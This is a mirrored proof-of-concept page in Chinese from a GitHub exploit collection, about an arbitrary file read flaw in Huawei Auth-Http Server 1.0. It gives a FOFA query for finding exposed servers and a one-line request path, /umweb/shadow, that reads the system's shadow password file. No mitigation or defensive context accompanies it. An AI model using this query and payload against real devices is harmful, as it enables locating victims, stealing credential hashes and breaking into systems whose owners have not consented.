mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-30 06:24:42 +00:00
25 lines
699 B
Markdown
25 lines
699 B
Markdown
![]() |
# 华为Auth-Http Server 1.0存在任意文件读取
|
||
|
|
||
|
# 一、漏洞简介
|
||
|
华为Auth-Http Server 1.0存在任意文件读取漏洞
|
||
|
|
||
|
# 二、影响版本
|
||
|
+ 华为Auth-Http Server 1.0
|
||
|
|
||
|
# 三、资产测绘
|
||
|
+ fofa`server="Huawei Auth-Http Server 1.0"`
|
||
|
+ 特征
|
||
|
|
||
|

|
||
|
|
||
|
## 四、漏洞复现
|
||
|
```plain
|
||
|
/umweb/shadow
|
||
|
```
|
||
|
|
||
|

|
||
|
|
||
|
|
||
|
|
||
|
> 更新: 2024-02-29 23:57:13
|
||
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/idyr2darqkc3u2m2>
|